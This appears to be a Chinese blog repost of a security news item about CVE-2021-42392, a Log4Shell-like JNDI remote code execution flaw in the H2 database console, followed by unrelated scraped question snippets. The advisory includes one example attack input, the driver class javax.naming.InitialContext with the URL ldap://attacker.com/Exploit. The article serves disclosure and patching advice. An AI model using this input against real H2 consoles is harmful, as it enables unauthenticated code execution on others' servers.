- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章警告!与Log4Shell相似的Java漏洞出现了由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
安全研究人员警告称,一个最新的严重的Java错误,其本质与目前在全球范围内利用的臭名昭著的 Log4Shell 漏洞相同 .
CVE-2021-42392 尚未在国家漏洞数据库 (NVD) 中正式发布,但据软件企业内JFrog 称,它影响了流行的H2 Java SQL 数据库的控制台.
这家安全公司提醒,任何目前运行的暴露于其 LAN 或 WAN 的 H2 控制台的组织立即将数据库更新到 2.0.206 版本,否则攻击者可能会利用它进行未经身份验证的远程代码执行 (RCE).
与 Log4Shell 一样,该错误与 JNDI(Java 命名和目录接口)“远程类加载”有关。JNDI 是一种为 Java 应用程序提供命名和目录功能的 API。这意味着如果攻击者可以将恶意 URL 获取到 JNDI 查找中,它就可以启用 RCE.
“简而言之,根本原因类似于 Log4Shell——H2 数据库框架中的多个代码路径将未经过滤的攻击者控制的 URL 传递给 javax.naming.Context.lookup 函数,该函数允许远程代码库加载(AKA Java 代码注入 AKA远程代码执行),” JFrog 解释道.
“具体来说,org.h2.util.JdbcUtils.getConnection 方法以驱动类名和数据库 URL 作为参数。如果驱动程序的类可分配给 javax.naming.Context 类,则该方法会从中实例化一个对象并调用其查找方法。” 。
提供诸如“javax.naming.InitialContext”之类的驱动程序类和像 ldap://attacker.com/Exploit 这样简单的 URL 将导致远程代码执行.
JFrog 表示,该漏洞特别危险,因为 H2 数据库包特别受欢迎。该公司声称,它是前 50 个最受欢迎的 Maven 软件包之一,拥有近 7000 个工件依赖项.
但是,有一些原因导致利用不会像 Log4Shell 那样广泛。一方面,它具有“直接影响范围”,这意味着易受攻击的服务器应该更容易找到。其次,在大多数 H2 发行版中,控制台只监听 localhost 连接,这意味着默认设置是不可利用的.
“许多供应商可能正在运行 H2 数据库,但没有运行 H2 控制台,虽然除了控制台之外还有其他向量可以利用这个问题,但这些其他向量是依赖于上下文的,不太可能暴露给远程攻击者。”JFrog 补充道.
原文链接:https://t.cj.sina.com.cn/articles/view/5095232218/12fb312da019012a18 。
最后此篇关于警告!与Log4Shell相似的Java漏洞出现了的文章就讲到这里了,如果你想了解更多关于警告!与Log4Shell相似的Java漏洞出现了的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
你好,我正在尝试在 opensuse 中创建一个 Shell 脚本来创建 MySqlUsers,但是当我尝试运行它时,我得到了这个错误: Warning: Could not start progra
我阅读了有关此错误的所有信息,但未能找到任何解决方案。 我有一个看起来像这样的简单页面: $xmlfile = "/var/www/marees.xml"; //Fichier dans lequel
运行 Websphere App 服务器 V8.5 Liberty Profile。我找不到任何可以解决这些警告的帮助。我在 eclipse 。 ************** He
我尝试在 GC AppEngine 上部署应用程序。部署过程中没有错误,但应用程序无法运行(仅显示加载页面)。日志中唯一一个奇怪的原始 OpenBLAS WARNING - could not det
我刚开始学习 RestKit。我正在尝试使用它来使用 Foursquare api 获取附近的 field 。但每次我尝试“objectLoader:(RKObjectLoader *)objectL
我对 Vuejs 比较陌生,每次按键时都会收到以下警告: [Vue warn]: $attrs is readonly. found in ---> at src\component
Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external
我在尝试修改某些表时不断收到此错误。这是我的代码: /** = 1){ //$this->mysqli->autocommit(FALSE); //insert th
当我尝试使用 PHP 的 ftp_put 函数上传文件时,早些时候出现错误: 警告:ftp_put() [function.ftp-put]:无数据连接 现在,我尝试开启被动模式: ftp_pasv(
我一直在努力让这段代码适用于现阶段的年龄。它旨在计算一个范围内的素数,我已经编写了一种方法来打印它们。不幸的是,代码将无法编译,引用警告: “警告:[未检查] 未检查调用 add(E) 作为原始类型
尝试使用带有架构组件和Kotlin的Android Studio 3 Canary 5构建示例会给出此警告。 谁能告诉我原因? 谢谢,Ove 编辑#1: 这是Dan Lew前段时间制作的样本 http
我正在编写一个 Shiny 的应用程序,它运行得非常好,突然我收到两条警告消息。我已经回到以前运行良好的副本,它们现在显示相同的错误消息,所以我真的很困惑。我的代码仍然运行并在我 Shiny 的仪表板
03-25 05:52:15.329 8029-8042/com.mgh.radio W/MediaPlayerNative: info/warning (703, 0) 03-25 05:52:15
我在构建时在我的 gradle 控制台中收到一条警告消息: 警告:[options] 引导类路径未与 -source 1.7 一起设置 1 条警告 我怎样才能解决这个问题? 任何帮助表示赞赏! 最佳答
我有下一个代码: 测试.c #include "a1.h" int main() { int a = 8; foo(a); return a; } a1.h void foo
我的程序中有一个 WORD 变量。 WORD hour; 但是当我比较它的时候 if(hour>=0 && hour=0 && hour=0 的比较,它始终适用于 hour 是 WORD 类型,它是一
安全研究人员警告称,一个最新的严重的Java错误,其本质与目前在全球范围内利用的臭名昭著的 Log4Shell 漏洞相同 。 CVE-2021-42392 尚未在国家漏洞数据库 (NVD) 中
安装SqlServer2005时“版本变更检查 (警告)"问题排查 今天同事在安装SqlServer2005时遇到“版本变更检查 (警告) ”问题导致安装失败,警告提示如下: - 版本
我的 UWP 项目中出现以下警告。我已经标记了解决方案的示例,但我更感兴趣的是为什么在同一平台上创建另一个空项目时不会出现此警告? APPX4001: Build property AppxBundl
我试图修复我的登录脚本,在我的本地主机上它可以工作,但上传到我的在线测试服务器时,注销被破坏,我得到这个错误: Warning: session_destroy() [function.session
我是一名优秀的程序员,十分优秀!